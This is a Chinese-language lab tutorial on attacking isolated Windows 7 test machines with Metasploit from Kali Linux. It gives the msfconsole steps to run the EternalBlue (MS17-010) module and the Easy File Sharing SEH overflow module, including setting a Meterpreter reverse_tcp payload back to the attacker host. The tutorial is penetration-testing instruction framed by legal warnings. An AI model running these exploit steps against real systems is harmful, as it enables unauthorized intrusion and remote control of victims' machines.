900字范文,内容丰富有趣,生活中的好帮手!
900字范文 > kali linux渗透攻击基于漏洞工具Metasploit

kali linux渗透攻击基于漏洞工具Metasploit

时间:2022-06-14 02:30:24

相关推荐

kali linux渗透攻击基于漏洞工具Metasploit

章节目录

本章节是基于漏洞工具Metasploit做的什么是MetasploitMeterpreter功能渗透环境7.1 Metasploit的基础1、Metasploit启动的三种方法:2、Metasploit的常用模块:3、帮助help4、命令几个种类: 7.2 Metasploit的基本命令最常用的几个命令: 7.3 使用Metasploit对操作系统发起攻击MS17_010漏洞始末使用metasploit的smb_ms17_010检测脚本,确定目标系统是否存在ms17_010漏洞。1、查找针对MS17_010漏洞的渗透模块2、载入ms17_010_eternalblue渗透模块,查看需要设置的参数并进行设置,启动模块。3、控制目标主机 7.4 使用Metasploit对软件发起攻击EasyFileSharing漏洞的的发现、利用和修复的过程1、查找与EasyFileSharing有关的渗透模块2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。3、在kali linux上配置参数并且发动攻击4、在目标靶机启动Easy File Sharing.5、返回到kali中查看,会话成功建立了! 学习总结

本章节是基于漏洞工具Metasploit做的

该文章只提供学习,禁止做违法的事情,任何后果与作者无关

1, 依据《刑法修正案(七)》第9条增的《刑法》第 285条第3款的规定,犯提供非法侵入或者控制计算机信息系罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。

2,第二百八十五条第二款 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

3,刑法第二百五十三条之一:“国家机关或者金融、电信、交通、教育、医疗等单位的工作人员,违反国家规定,将本单位在履行职责或者提供服务过程中获得的公民个人信息,出售或者非法提供给他人,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金。情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

什么是Metasploit

Meterpreter是一个Metasploit有效载荷,它提供了一个交互式shell,攻击者可以在受害者系统上使用和执行代码。它使用内存中 DLL 注入进行部署。这允许Meterpreter完全部署在内存中,并且不会向磁盘写入任何内容。没有新的进程,因为Meterpreter被注入到受影响的进程中。它也可能转移到其他操作流程。因此,Meterpreter的法医足迹非常小。

Meterpreter功能

Meterpreter为您提供了大量选项供您探索。您可以通过在 meterpreter 控制台中键入“帮助”来获取命令。您可以使用 Linux 的基本导航命令导航受害计算机。您还可以将一些文件下载或上传到受害者系统。有一个搜索选项可以使用您想要的关键字搜索受害者机器:

您可以使用该命令列出在受害计算机中运行的进程。有一个选项可以查看托管计量器的进程的 PID

渗透环境

使用Kali Linux.1进行演示操作

目标靶机:靶机(Windows7 64位 永恒之蓝);靶机(32位Windows 7,安装了Easy File Sharing HTTP Server)

软件:Msfvenom、Msfconsole(Kali Linux系统内置)

7.1 Metasploit的基础

1、Metasploit启动的三种方法:

(1)菜单进入

(2)工具栏进入

(3)命令行进入

2、Metasploit的常用模块:

(1)exploit(漏洞渗透模块)

(2)payload(攻击载荷模块)

(3)auxiliary(辅助模块)

(4)post(后渗透攻击模块)

3、帮助help

4、命令几个种类:

(1)核心命令core command

(2)模块命令module command

(3)任务命令job command

(4)资源命令resource script command

(5)数据库后台命令database backed command

(6)登录凭证后台命令credentials backed command

7.2 Metasploit的基本命令

最常用的几个命令:

(1)show 显示

(2)search 搜索

(3)use 使用(某模块)

7.3 使用Metasploit对操作系统发起攻击

实验环境:填写如下IP地址

Kali 2主机IP: 192.168.17.134

靶机(64位windows 7,永恒之蓝靶机)IP:192.168.17.128

MS17_010漏洞始末

黑客组织shadow Brokers(影子经纪人)盗取NSA的(National Security

Agency,美国国家安全局)信息战武器库中的国家级黑客工具,并希望在黑市中销售,由于各种原因无人购买,以下是随后发生的事件:

3月14日微软发布了修复MS17-010漏洞的补丁。
4月14日晚,Shadow Brokers公布了NSA的部分网络战攻击武器,其中就包含“永恒之蓝”工具。“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
5月12日,“永恒之蓝”被改造,制成了wannacry勒索病毒。地球村中的世界各国均被波及,受害者需要支付高额赎金(比特币,因为可以洗钱)才能恢复文件。

上面的网络攻击武器来源于美国国家安全局。

使用metasploit的smb_ms17_010检测脚本,确定目标系统是否存在ms17_010漏洞。

启动metasploit

msfconsole (启动metasploit)

1、查找针对MS17_010漏洞的渗透模块

search ms17_010 (查看ms17_010漏洞)

2、载入ms17_010_eternalblue渗透模块,查看需要设置的参数并进行设置,启动模块。

use exploit/windows/smb/ms17_010_eternalblue(选择攻击模块)show options(查看模块所需参数)set rhosts 192.168.xx.xx(目标靶机的IP地址)

![请添加图片描述](https://img-/660db7cd922b4fcd98ecc1a0bb166b6f.png#pic_center =800x=400)

3、控制目标主机

run (开始攻击)

7.4 使用Metasploit对软件发起攻击

实验环境:填写如下IP地址

Kali 2主机:192.168.17.134

靶机(32位Windows 7,安装了Easy File Sharing HTTP Server)IP:192.168.17.130

EasyFileSharing漏洞的的发现、利用和修复的过程

Easy File Sharing Web Server 6.9

缓冲区溢出漏洞,这个漏洞可能是在左右被发现的,因为我看到了一些关于这个漏洞的分析和利用的文章

。这个漏洞可以被黑客利用来执行任意代码或弹出计算器等操作,有多种方法可以触发这个漏洞,如使用Python脚本或Metasploit框架等。我不知道这个漏洞是否已经被修复,因为我没有找到关于这个软件的最新版本或更新的信息。Easy File Sharing Web Server

目录遍历漏洞,这个漏洞可能是在被发现的,因为我看到了一篇关于这个漏洞的分析和利用的文章。这个漏洞可以被黑客利用来上传任意文件到服务器上,从而获取敏感信息或执行恶意代码。这篇文章提供了一个Python脚本来利用这个漏洞,并给出了一些防御建议,如禁用文件上传功能或限制文件类型等。我不知道这个漏洞是否已经被修复,因为我没有找到关于这个软件的最新版本或更新的信息。Easy File Sharing FTP Server

PASS命令处理漏洞,这个漏洞可能是在被发现的,因为我看到了一篇关于这个漏洞的分析和利用的文章。这个漏洞可以被黑客利用来执行任意代码或弹出计算器等操作,有多种方法可以触发这个漏洞,如使用Python脚本或Metasploit框架等。这篇文章提供了一个Python脚本来利用这个漏洞,并给出了一些防御建议,如升级软件版本或关闭FTP服务等。我不知道这个漏洞是否已经被修复,因为我没有找到关于这个软件的最新版本或更新的信息。

1、查找与EasyFileSharing有关的渗透模块

(1)启动Metarsploit

命令:与上面启动命令一样

(2)查找与EasyFileSharing有关的渗透模块

search EasyFileSharing (查找与EasyFileSharing有关的渗透模块)

2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。

use windows/http/easyfilesharing_seh (载入easyfilesharing_seh渗透模块)show options (查看需要设置的参数)

3、在kali linux上配置参数并且发动攻击

set payload windows/meterpreter/reverse_tcp (设置攻击载荷)set lhost 192.168.xx.xx (kali本机ip)set rhosts 192.168.xx.xx (被攻击的ip)set rport 80 (端口参数)exploit (开始攻击)

4、在目标靶机启动Easy File Sharing.

5、返回到kali中查看,会话成功建立了!

学习总结

Metasploit是一款基于漏洞的渗透测试框架,它可以帮助我们对目标系统进行扫描、攻击、利用和防御,以评估其安全性和漏洞。

使用Metasploit进行渗透测试时,需要注意选择合适的辅助模块和攻击模块,并根据目标的特点和情况进行参数设置和模块执行。

使用Metasploit进行渗透测试时,也需要注意选择合适的攻击载荷,并根据目标的反应和返回信息进行调整和变化。

我们向您展示了如何在故意易受攻击的机器虚拟机上使用Metasploit。实际上,这些类型的过时和易受攻击的机器现在可能不存在。但是,有很多媒介可能从中发起攻击。继续学习。

使用Metasploit进行渗透测试时,也需要注意遵守法律法规和道德规范,只对授权或自己搭建的目标进行测试,不要对他人或公共服务造成不必要的麻烦或损害。

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。